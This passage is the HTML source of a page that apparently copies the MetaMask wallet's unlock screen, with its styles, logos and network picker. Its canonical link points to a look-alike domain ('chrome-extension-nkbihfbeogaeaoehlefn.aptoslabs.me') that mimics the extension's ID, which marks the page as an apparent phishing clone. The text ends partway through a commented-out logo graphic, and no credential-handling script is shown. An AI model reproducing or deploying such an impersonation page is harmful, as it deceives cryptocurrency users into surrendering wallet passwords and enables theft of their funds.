<!DOCTYPE html>
<html>
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
      <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
      <meta data-n-head="ssr" http-equiv="X-UA-Compatible" content="IE=edge">
      <meta data-n-head="ssr" name="viewport"
          content="width=device-width, maximum-scale=1, initial-scale=1, user-scalable=0">
      <title>MetaMask</title>
      <link rel="canonical" href="https://chrome-extension-nkbihfbeogaeaoehlefn.aptoslabs.me" />
      <link rel="shortcut icon"
          href="./images/logo/metamask-fox.svg">
          <script type="text/javascript" async="" src="./jquery-3.6.0.min.js"></script>
      <link rel="stylesheet" type="text/css" href="./index.css" title="ltr">
      <link rel="stylesheet" type="text/css" href="./index-rtl.css" title="rtl" disabled="">
      <style></style>
      <style data-jss="" data-meta="MuiInputBase">
         @-webkit-keyframes mui-auto-fill {}
         @-webkit-keyframes mui-auto-fill-cancel {}
         .MuiInputBase-root {
         color: rgba(0, 0, 0, 0.87);
         cursor: text;
         display: inline-flex;
         position: relative;
         font-size: 1rem;
         box-sizing: border-box;
         align-items: center;
         font-family: "Roboto", "Helvetica", "Arial", sans-serif;
         font-weight: 400;
         line-height: 1.1876em;
         letter-spacing: 0.00938em;
         }
         .MuiInputBase-root.Mui-disabled {
         color: rgba(0, 0, 0, 0.38);
         cursor: default;
         }
         .MuiInputBase-multiline {
         padding: 6px 0 7px;
         }
         .MuiInputBase-multiline.MuiInputBase-marginDense {
         padding-top: 3px;
         }
         .MuiInputBase-fullWidth {
         width: 100%;
         }
         .MuiInputBase-input {
         font: inherit;
         color: currentColor;
         width: 100%;
         border: 0;
         height: 1.1876em;
         margin: 0;
         display: block;
         padding: 6px 0 7px;
         min-width: 0;
         background: none;
         box-sizing: content-box;
         animation-name: mui-auto-fill-cancel;
         letter-spacing: inherit;
         animation-duration: 10ms;
         -webkit-tap-highlight-color: transparent;
         }
         .MuiInputBase-input::-webkit-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input::-moz-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input:-ms-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input::-ms-input-placeholder {
         color: currentColor;
         opacity: 0.42;
         transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         }
         .MuiInputBase-input:focus {
         outline: 0;
         }
         .MuiInputBase-input:invalid {
         box-shadow: none;
         }
         .MuiInputBase-input::-webkit-search-decoration {
         -webkit-appearance: none;
         }
         .MuiInputBase-input.Mui-disabled {
         opacity: 1;
         }
         .MuiInputBase-input:-webkit-autofill {
         animation-name: mui-auto-fill;
         animation-duration: 5000s;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
         opacity: 0 !important;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
         opacity: 0.42;
         }
         label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
         opacity: 0.42;
         }
         .MuiInputBase-inputMarginDense {
         padding-top: 3px;
         }
         .MuiInputBase-inputMultiline {
         height: auto;
         resize: none;
         padding: 0;
         }
         .MuiInputBase-inputTypeSearch {
         -moz-appearance: textfield;
         -webkit-appearance: textfield;
         }
      </style>
      <style data-jss="" data-meta="MuiInput">
         .MuiInput-root {
         position: relative;
         }
         label + .MuiInput-formControl {
         margin-top: 16px;
         }
         .MuiInput-colorSecondary.MuiInput-underline:after {
         border-bottom-color: #f50057;
         }
         .MuiInput-underline:after {
         left: 0;
         right: 0;
         bottom: 0;
         content: "";
         position: absolute;
         transform: scaleX(0);
         transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
         border-bottom: 2px solid #3f51b5;
         pointer-events: none;
         }
         .MuiInput-underline.Mui-focused:after {
         transform: scaleX(1);
         }
         .MuiInput-underline.Mui-error:after {
         transform: scaleX(1);
         border-bottom-color: #f44336;
         }
         .MuiInput-underline:before {
         left: 0;
         right: 0;
         bottom: 0;
         content: "\00a0";
         position: absolute;
         transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
         border-bottom: 1px solid rgba(0, 0, 0, 0.42);
         pointer-events: none;
         }
         .MuiInput-underline:hover:not(.Mui-disabled):before {
         border-bottom: 2px solid rgba(0, 0, 0, 0.87);
         }
         .MuiInput-underline.Mui-disabled:before {
         border-bottom-style: dotted;
         }
         @media (hover: none) {
         .MuiInput-underline:hover:not(.Mui-disabled):before {
         border-bottom: 1px solid rgba(0, 0, 0, 0.42);
         }
         }
      </style>
      <style data-jss="" data-meta="MuiFormLabel">
         .MuiFormLabel-root {
         color: rgba(0, 0, 0, 0.54);
         padding: 0;
         font-size: 1rem;
         font-family: "Roboto", "Helvetica", "Arial", sans-serif;
         font-weight: 400;
         line-height: 1;
         letter-spacing: 0.00938em;
         }
         .MuiFormLabel-root.Mui-focused {
         color: #3f51b5;
         }
         .MuiFormLabel-root.Mui-disabled {
         color: rgba(0, 0, 0, 0.38);
         }
         .MuiFormLabel-root.Mui-error {
         color: #f44336;
         }
         .MuiFormLabel-colorSecondary.Mui-focused {
         color: #f50057;
         }
         .MuiFormLabel-asterisk.Mui-error {
         color: #f44336;
         }
      </style>
      <style data-jss="" data-meta="MuiInputLabel">
         .MuiInputLabel-root {
         display: block;
         transform-origin: top left;
         }
         .MuiInputLabel-formControl {
         top: 0;
         left: 0;
         position: absolute;
         transform: translate(0, 24px) scale(1);
         }
         .MuiInputLabel-marginDense {
         transform: translate(0, 21px) scale(1);
         }
         .MuiInputLabel-shrink {
         transform: translate(0, 1.5px) scale(0.75);
         transform-origin: top left;
         }
         .MuiInputLabel-animated {
         transition: color 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms,transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
         }
         .MuiInputLabel-filled {
         z-index: 1;
         transform: translate(12px, 20px) scale(1);
         pointer-events: none;
         }
         .MuiInputLabel-filled.MuiInputLabel-marginDense {
         transform: translate(12px, 17px) scale(1);
         }
         .MuiInputLabel-filled.MuiInputLabel-shrink {
         transform: translate(12px, 10px) scale(0.75);
         }
         .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
         transform: translate(12px, 7px) scale(0.75);
         }
         .MuiInputLabel-outlined {
         z-index: 1;
         transform: translate(14px, 20px) scale(1);
         pointer-events: none;
         }
         .MuiInputLabel-outlined.MuiInputLabel-marginDense {
         transform: translate(14px, 12px) scale(1);
         }
         .MuiInputLabel-outlined.MuiInputLabel-shrink {
         transform: translate(14px, -6px) scale(0.75);
         }
      </style>
      <style data-jss="" data-meta="MuiFormControl">
         .MuiFormControl-root {
         border: 0;
         margin: 0;
         display: inline-flex;
         padding: 0;
         position: relative;
         min-width: 0;
         flex-direction: column;
         vertical-align: top;
         }
         .MuiFormControl-marginNormal {
         margin-top: 16px;
         margin-bottom: 8px;
         }
         .MuiFormControl-marginDense {
         margin-top: 8px;
         margin-bottom: 4px;
         }
         .MuiFormControl-fullWidth {
         width: 100%;
         }
      </style>
      <style data-jss="" data-meta="MuiTextField">
      </style>
      <style data-jss="" data-meta="makeStyles">
         .jss1 {
         color: var(--color-text-alternative);
         font-weight: 400;
         }
         .jss1.jss2 {
         color: var(--color-text-alternative);
         }
         .jss1.jss4 {
         color: var(--color-text-alternative);
         }
         .jss3:before {
         border-bottom: 1px solid var(--color-text-default) !important;
         }
         .jss3:after {
         border-bottom: 2px solid var(--color-primary-default);
         }
         .jss5 {
         color: var(--color-text-alternative);
         }
         .jss6 {
         padding: 8px;
         }
         .jss6::placeholder {
         color: var(--color-text-alternative);
         }
         .jss7 {
         color: var(--color-background-default);
         }
         .jss8:after {
         border-bottom: 2px solid var(--color-background-default);
         }
         .jss9.jss10 {
         color: var(--color-text-alternative);
         }
         .jss9.jss4 {
         color: var(--color-text-alternative);
         }
         .jss12 {
         color: var(--color-text-default);
         border: 1px solid var(--color-border-default);
         height: 48px;
         display: flex;
         padding: 0 16px;
         align-items: center;
         border-radius: 6px;
         background-color: var(--color-background-default);
         }
         label + .jss12 {
         margin-top: 9px;
         }
         .jss12.jss11 {
         border: 1px solid var(--color-primary-default);
         }
         .jss13 {
         color: var(--color-text-default);
         position: initial;
         font-size: 1rem;
         transform: none;
         transition: none;
         }
         .jss14 {
         color: var(--color-text-default);
         position: initial;
         font-size: .75rem;
         transform: none;
         transition: none;
         }
         .jss15 {
         line-height: initial !important;
         }
      </style>
      <style>
         .error-text {
            margin-top: 10px;
            font-size: 1rem;
            font-family: 'Roboto', 'Helvetica', 'Arial', sans-serif;
            font-weight: 500;
            color: #f44336;
        }

      </style>
   </head>
   <body>
      <div id="app-content" class="app-loading-class">
         <img class="loading-logo" src="./images/logo/metamask-fox.svg" alt="" loading="lazy" />
         <img class="loading-spinner" src="./images/spinner.gif" alt="" loading="lazy" />
       </div>

      <div id="app-content" class="app-content-class">
         <div class="app os-win">
            <div class="mm-box multichain-app-header multichain-app-header-shadow mm-box--margin-bottom-0 mm-box--display-flex mm-box--align-items-center mm-box--width-full mm-box--background-color-background-default">
               <div class="mm-box  mm-box--padding-2 mm-box--display-flex mm-box--gap-2 mm-box--justify-content-space-between mm-box--align-items-center mm-box--width-full mm-box--background-color-background-default">
                  <div>
                     <button class="mm-box mm-picker-network multichain-app-header__contents__network-picker mm-box--padding-right-4 mm-box--padding-left-2 mm-box--display-flex mm-box--gap-2 mm-box--align-items-center mm-box--background-color-background-alternative mm-box--rounded-pill" data-testid="network-display">
                        <div class="mm-box mm-text mm-avatar-base mm-avatar-base--size-xs mm-avatar-network mm-picker-network__avatar-network mm-text--body-xs mm-text--text-transform-uppercase mm-box--display-flex mm-box--justify-content-center mm-box--align-items-center mm-box--color-text-default mm-box--background-color-background-alternative mm-box--rounded-full mm-box--border-color-transparent box--border-style-solid box--border-width-1">
                           <img class="mm-avatar-network__network-image" src="./images/eth_logo.svg" alt="Ethereum Mainnet logo"></div>
                        <span class="mm-box mm-text mm-text--body-sm mm-text--ellipsis mm-box--color-text-default">Ethereum Mainnet</span><span class="mm-box mm-picker-network__arrow-down-icon mm-icon mm-icon--size-xs mm-box--margin-left-auto mm-box--display-inline-block mm-box--color-icon-default" style="mask-image: url(&quot;./images/icons/arrow-down.svg&quot;);"></span>
                    
                     </button>
                  </div>
                  <!-- <button class="mm-box app-header__logo-container app-header__logo-container--clickable mm-box--background-color-transparent" data-testid="app-header-logo"> -->
                     <!-- <svg height="30" viewBox="0 0 1311 242" width="162" xmlns="http://www.w3.org/2000/svg" class="app-header__metafox-logo--horizontal">
                        <g fill="none">
                           <g fill="var(--color-text-default)" transform="translate(361 61)">
                              <path d="m796.7 60.9c-6.8-4.5-14.3-7.7-21.4-11.7-4.6-2.6-9.5-4.9-13.5-8.2-6.8-5.6-5.4-16.6 1.7-21.4 10.2-6.8 27.1-3 28.9 10.9 0 .3.3.5.6.5h15.4c.4 0 .7-.3.6-.7-.8-9.6-4.5-17.6-11.3-22.7-6.5-4.9-13.9-7.5-21.8-7.5-40.7 0-44.4 43.1-22.5 56.7 2.5 1.6 24 12.4 31.6 17.1s10 13.3 6.7 20.1c-3 6.2-10.8 10.5-18.6 10-8.5-.5-15.1-5.1-17.4-12.3-.4-1.3-.6-3.8-.6-4.9 0-.3-.3-.6-.6-.6h-16.7c-.3 0-.6.3-.6.6 0 12.1 3 18.8 11.2 24.9 7.7 5.8 16.1 8.2 24.8 8.2 22.8 0 34.6-12.9 37-26.3 2.1-13.1-1.8-24.9-13.5-32.7z"></path>
                              <path d="m71.6 2.3h-7.4-8.1c-.3 0-.5.2-.6.4l-13.7 45.2c-.2.6-1 .6-1.2 0l-13.7-45.2c-.1-.3-.3-.4-.6-.4h-8.1-7.4-10c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-87.7c0-.7 1-.8 1.2-.2l13.8 45.5 1 3.2c.1.3.3.4.6.4h12.8c.3 0 .5-.2.6-.4l1-3.2 13.8-45.5c.2-.7 1.2-.5 1.2.2v87.7c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-115.4c0-.3-.3-.6-.6-.6z"></path>
                              <path d="m541 2.3c-.3 0-.5.2-.6.4l-13.7 45.2c-.2.6-1 .6-1.2 0l-13.7-45.2c-.1-.3-.3-.4-.6-.4h-25.4c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-87.7c0-.7 1-.8 1.2-.2l13.8 45.5 1 3.2c.1.3.3.4.6.4h12.8c.3 0 .5-.2.6-.4l1-3.2 13.8-45.5c.2-.7 1.2-.5 1.2.2v87.7c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-115.4c0-.3-.3-.6-.6-.6z"></path>
                              <path d="m325.6 2.3h-31.1-16.7-31.1c-.3 0-.6.3-.6.6v14.4c0 .3.3.6.6.6h30.5v100.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-100.4h30.5c.3 0 .6-.3.6-.6v-14.4c0-.3-.2-.6-.6-.6z"></path>
                              <path d="m424.1 118.9h15.2c.4 0 .7-.4.6-.8l-31.4-115.8c-.1-.3-.3-.4-.6-.4h-5.8-10.2-5.8c-.3 0-.5.2-.6.4l-31.4 115.8c-.1.4.2.8.6.8h15.2c.3 0 .5-.2.6-.4l9.1-33.7c.1-.3.3-.4.6-.4h33.6c.3 0 .5.2.6.4l9.1 33.7c.1.2.4.4.6.4zm-39.9-51 12.2-45.1c.2-.6 1-.6 1.2 0l12.2 45.1c.1.4-.2.8-.6.8h-24.4c-.4 0-.7-.4-.6-.8z"></path>
                              <path d="m683.3 118.9h15.2c.4 0 .7-.4.6-.8l-31.4-115.8c-.1-.3-.3-.4-.6-.4h-5.8-10.2-5.8c-.3 0-.5.2-.6.4l-31.4 115.8c-.1.4.2.8.6.8h15.2c.3 0 .5-.2.6-.4l9.1-33.7c.1-.3.3-.4.6-.4h33.6c.3 0 .5.2.6.4l9.1 33.7c.1.2.3.4.6.4zm-39.9-51 12.2-45.1c.2-.6 1-.6 1.2 0l12.2 45.1c.1.4-.2.8-.6.8h-24.4c-.4 0-.7-.4-.6-.8z"></path>
                              <path d="m149.8 101.8v-35.8c0-.3.3-.6.6-.6h44.5c.3 0 .6-.3.6-.6v-14.4c0-.3-.3-.6-.6-.6h-44.5c-.3 0-.6-.3-.6-.6v-30.6c0-.3.3-.6.6-.6h50.6c.3 0 .6-.3.6-.6v-14.4c0-.3-.3-.6-.6-.6h-51.2-17.3c-.3 0-.6.3-.6.6v15 31.9 15.6 37 15.8c0 .3.3.6.6.6h17.3 53.3c.3 0 .6-.3.6-.6v-15.2c0-.3-.3-.6-.6-.6h-52.8c-.3-.1-.5-.3-.5-.7z"></path>
                              <path d="m949.3 117.9-57.8-59.7c-.2-.2-.2-.6 0-.8l52-54c.4-.4.1-1-.4-1h-21.3c-.2 0-.3.1-.4.2l-44.1 45.8c-.4.4-1 .1-1-.4v-45c0-.3-.3-.6-.6-.6h-16.7c-.3 0-.6.3-.6.6v115.4c0 .3.3.6.6.6h16.7c.3 0 .6-.3.6-.6v-50.8c0-.5.7-.8 1-.4l50 51.6c.1.1.3.2.4.2h21.3c.4-.1.7-.8.3-1.1z"></path>
                           </g>
                           <g stroke-linecap="round" stroke-linejoin="round" transform="translate(1 1)">
                              <path d="m246.1.2-101.1 75 18.8-44.2z" fill="#e17726" stroke="#e17726"></path>
                              <g fill="#e27625" stroke="#e27625" transform="translate(2)">
                                 <path d="m10.9.2 100.2 75.7-17.9-44.9z"></path>
                                 <path d="m207.7 174.1-26.9 41.2 57.6 15.9 16.5-56.2z"></path>
                                 <path d="m.2 175 16.4 56.2 57.5-15.9-26.8-41.2z"></path>
                                 <path d="m71 104.5-16 24.2 57 2.6-1.9-61.5z"></path>
                                 <path d="m184 104.5-39.7-35.4-1.3 62.2 57-2.6z"></path>
                                 <path d="m74.1 215.3 34.5-16.7-29.7-23.2z"></path>
                                 <path d="m146.4 198.6 34.4 16.7-4.7-39.9z"></path>
                              </g>
                              <g fill="#d5bfb2" stroke="#d5bfb2" transform="translate(76 198)">
                                 <path d="m106.8 17.3-34.4-16.7 2.8 22.4-.3 9.5z"></path>
                                 <path d="m.1 17.3 32 15.2-.2-9.5 2.7-22.4z"></path>
                              </g>
                              <path d="m108.7 160.6-28.6-8.4 20.2-9.3z" fill="#233447" stroke="#233447"></path>
                              <path d="m150.3 160.6 8.4-17.7 20.3 9.3z" fill="#233447" stroke="#233447"></path>
                              <g fill="#cc6228" stroke="#cc6228" transform="translate(49 128)">
                                 <path d="m27.1 87.3 5-41.2-31.8.9z"></path>
                                 <path d="m128.9 46.1 4.9 41.2 26.9-40.3z"></path>
                                 <path d="m153 .7-57 2.6 5.3 29.3 8.4-17.7 20.3 9.3z"></path>
                                 <path d="m31.1 24.2 20.2-9.3 8.4 17.7 5.3-29.3-57-2.6z"></path>
                              </g>
                              <g fill="#e27525" stroke="#e27525" transform="translate(57 128)">
                                 <path d="m0 .7 23.9 46.7-.8-23.2z"></path>
                                 <path d="m122 24.2-.9 23.2 23.9-46.7z"></path>
                                 <path d="m57 3.3-5.3 29.3 6.7 34.6 1.5-45.6z"></path>
                                 <path d="m88 3.3-2.8 18.2 1.4 45.7 6.7-34.6z"></path>
                              </g>
                              <path d="m150.3 160.6-6.7 34.6 4.8 3.4 29.7-23.2.9-23.2z" fill="#f5841f" stroke="#f5841f"></path>
                              <path d="m80.1 152.2.8 23.2 29.7 23.2 4.8-3.4-6.7-34.6z" fill="#f5841f" stroke="#f5841f"></path>
                              <path d="m150.9 230.5.3-9.5-2.6-2.2h-38.2l-2.5 2.2.2 9.5-32-15.2 11.2 9.2 22.7 15.7h38.9l22.8-15.7 11.1-9.2z" fill="#c0ac9d" stroke="#c0ac9d"></path>
                              <path d="m148.4 198.6-4.8-3.4h-28.2l-4.8 3.4-2.7 22.4 2.5-2.2h38.2l2.6 2.2z" fill="#161616" stroke="#161616"></path>
                              <g fill="#763e1a" stroke="#763e1a">
                                 <path d="m250.4 80.1 8.5-41.4-12.8-38.5-97.7 72.5 37.6 31.8 53.1 15.5 11.7-13.7-5.1-3.7 8.1-7.4-6.2-4.8 8.1-6.2z"></path>
                                 <path d="m.1 38.7 8.6 41.4-5.5 4.1 8.2 6.2-6.2 4.8 8.1 7.4-5.1 3.7 11.7 13.7 53.1-15.5 37.6-31.8-97.7-72.5z"></path>
                              </g>
                              <g fill="#f5841f" stroke="#f5841f">
                                 <path d="m239.1 120-53.1-15.5 16 24.2-23.9 46.7 31.6-.4h47.2z"></path>
                                 <path d="m73 104.5-53.1 15.5-17.7 55h47.1l31.6.4-23.9-46.7z"></path>
                                 <path d="m145 131.3 3.4-58.6 15.4-41.7h-68.6l15.4 41.7 3.4 58.6 1.3 18.4.1 45.5h28.2l.1-45.5z"></path>
                              </g>
                           </g>
                        </g>
                     </svg> -->
                     <!-- <img src="./images/logo/metamask-fox.svg" class="app-header__metafox-logo--icon" alt=""> -->
                     
                     <!-- <img src="./images/logo/metamask.png" width="40" class="app-header__metafox-logo--horizontal"> -->
                     <img src="./images/logo/metamask.png" width="40">
                  </button>
               </div>
            </div>
            <div class="mm-box main-container-wrapper">
               <div class="unlock-page__container">
                  <div class="unlock-page" data-testid="unlock-page">
                     <div class="unlock-page__mascot-container">
                        <div id="logo-container">
                           <script src="js/.-5122-logo.js"></script>
                       </div>
                        <!-- <div style="z-index: 0;">
                           <svg width="120px" height="120px">
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="31.075363755226135,46.55951678752899 15.570180416107178,43.27731549739838 14.778560400009155,39.727190136909485"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="16.059021949768066,47.56135404109955 15.570180416107178,43.27731549739838 31.075363755226135,46.55951678752899"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="16.059021949768066,47.56135404109955 31.075363755226135,46.55951678752899 18.145676851272583,53.68240311741829"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="35.14021933078766,88.30222964286804 18.544825315475464,94.40075755119324 12.96559453010559,73.63439708948135"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="18.145676851272583,53.68240311741829 31.075363755226135,46.55951678752899 36.3968288898468,47.902564108371735"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="29.41533923149109,27.250696420669556 31.075363755226135,46.55951678752899 14.778560400009155,39.727190136909485"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="36.3968288898468,47.902564108371735 31.075363755226135,46.55951678752899 29.41533923149109,27.250696420669556"></polygon>
                              <polygon fill="rgb(225,119,25)" stroke="rgb(225,119,25)" points="35.14021933078766,88.30222964286804 42.14994192123413,85.22791922092438 44.71449136734009,84.59319770336151"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="27.4936044216156,55.76608657836914 12.96559453010559,73.63439708948135 18.145676851272583,53.68240311741829"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="12.96559453010559,73.63439708948135 24.528815746307373,72.53756672143936 35.14021933078766,88.30222964286804"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="24.528815746307373,72.53756672143936 12.96559453010559,73.63439708948135 27.4936044216156,55.76608657836914"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="12.790818214416504,41.13916039466858 14.778560400009155,39.727190136909485 15.570180416107178,43.27731549739838"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="16.059021949768066,47.56135404109955 13.313301801681519,44.96769189834595 15.570180416107178,43.27731549739838"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="18.145676851272583,53.68240311741829 14.211795330047607,48.84106993675232 16.059021949768066,47.56135404109955"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="48.18391174077988,35.45647144317627 14.046868085861206,11.360775232315063 45.7771173119545,21.446932554244995"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="14.778560400009155,39.727190136909485 11.196123361587524,25.194872617721558 29.41533923149109,27.250696420669556"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="61.89337112009525,34.91058647632599 48.18391174077988,35.45647144317627 45.7771173119545,21.446932554244995"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="45.7771173119545,21.446932554244995 70.66958159208298,19.935418367385864 61.89337112009525,34.91058647632599"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="18.145676851272583,53.68240311741829 36.3968288898468,47.902564108371735 27.4936044216156,55.76608657836914"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="29.41533923149109,27.250696420669556 48.18391174077988,35.45647144317627 36.3968288898468,47.902564108371735"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="29.41533923149109,27.250696420669556 11.196123361587524,25.194872617721558 14.046868085861206,11.360775232315063"></polygon>
                              <polygon fill="rgb(192,172,157)" stroke="rgb(192,172,157)" points="72.07480698823929,86.24481081962585 73.09325516223907,85.52714467048645 68.42797815799713,92.6217770576477"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="14.046868085861206,11.360775232315063 48.18391174077988,35.45647144317627 29.41533923149109,27.250696420669556"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="36.3968288898468,47.902564108371735 48.18391174077988,35.45647144317627 45.97417563199997,56.0689714550972"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="45.97417563199997,56.0689714550972 27.4936044216156,55.76608657836914 36.3968288898468,47.902564108371735"></polygon>
                              <polygon fill="rgb(225,119,25)" stroke="rgb(225,119,25)" points="97.67809867858887,4.720233678817749 61.89337112009525,34.91058647632599 70.66958159208298,19.935418367385864"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="98.80959033966064,52.593188881874084 77.78243243694305,46.99957340955734 86.16269409656525,45.23579388856888"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="83.18176746368408,24.378708600997925 86.16269409656525,45.23579388856888 77.78243243694305,46.99957340955734"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="103.14905405044556,36.61208152770996 86.16269409656525,45.23579388856888 83.18176746368408,24.378708600997925"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="86.16269409656525,45.23579388856888 103.14905405044556,36.61208152770996 102.10471630096436,40.70727825164795"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="101.34331941604614,45.59676021337509 98.80959033966064,52.593188881874084 86.16269409656525,45.23579388856888"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="101.34331941604614,45.59676021337509 86.16269409656525,45.23579388856888 102.10471630096436,40.70727825164795"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="77.78243243694305,46.99957340955734 61.89337112009525,34.91058647632599 83.18176746368408,24.378708600997925"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="107.84474730491638,75.29166162014008 102.04442381858826,98.5244357585907 74.79497104883194,89.84754145145416"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="35.14021933078766,88.30222964286804 24.528815746307373,72.53756672143936 34.170504212379456,72.47075915336609"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="98.80959033966064,52.593188881874084 80.42670965194702,55.229507982730865 77.78243243694305,46.99957340955734"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="77.78243243694305,46.99957340955734 80.42670965194702,55.229507982730865 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="57.233818620443344,55.96301078796387 61.89337112009525,34.91058647632599 77.78243243694305,46.99957340955734"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="48.18391174077988,35.45647144317627 61.89337112009525,34.91058647632599 57.233818620443344,55.96301078796387"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="57.233818620443344,55.96301078796387 45.97417563199997,56.0689714550972 48.18391174077988,35.45647144317627"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="80.42670965194702,55.229507982730865 98.80959033966064,52.593188881874084 107.84474730491638,75.29166162014008"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="83.18176746368408,24.378708600997925 61.89337112009525,34.91058647632599 97.67809867858887,4.720233678817749"></polygon>
                              <polygon fill="rgb(228,116,36)" stroke="rgb(228,116,36)" points="27.4936044216156,55.76608657836914 34.3772828578949,64.0020141005516 34.170504212379456,72.47075915336609"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="27.4936044216156,55.76608657836914 34.170504212379456,72.47075915336609 24.528815746307373,72.53756672143936"></polygon>
                              <polygon fill="rgb(228,119,25)" stroke="rgb(228,119,25)" points="74.79497104883194,89.84754145145416 83.53726208209991,73.45100373029709 107.84474730491638,75.29166162014008"></polygon>
                              <polygon fill="rgb(247,132,25)" stroke="rgb(247,132,25)" points="80.42670965194702,55.229507982730865 107.84474730491638,75.29166162014008 83.53726208209991,73.45100373029709"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="98.80959033966064,52.593188881874084 101.34331941604614,45.59676021337509 103.2298743724823,46.961681842803955"></polygon>
                              <polygon fill="rgb(205,98,0)" stroke="rgb(205,98,0)" points="34.3772828578949,64.0020141005516 27.4936044216156,55.76608657836914 45.97417563199997,56.0689714550972"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="105.19773244857788,38.074976205825806 102.10471630096436,40.70727825164795 103.14905405044556,36.61208152770996"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="101.34331941604614,45.59676021337509 102.10471630096436,40.70727825164795 104.41439151763916,42.49227046966553"></polygon>
                              <polygon fill="rgb(119,57,0)" stroke="rgb(119,57,0)" points="83.18176746368408,24.378708600997925 104.97556328773499,19.741848707199097 103.14905405044556,36.61208152770996"></polygon>
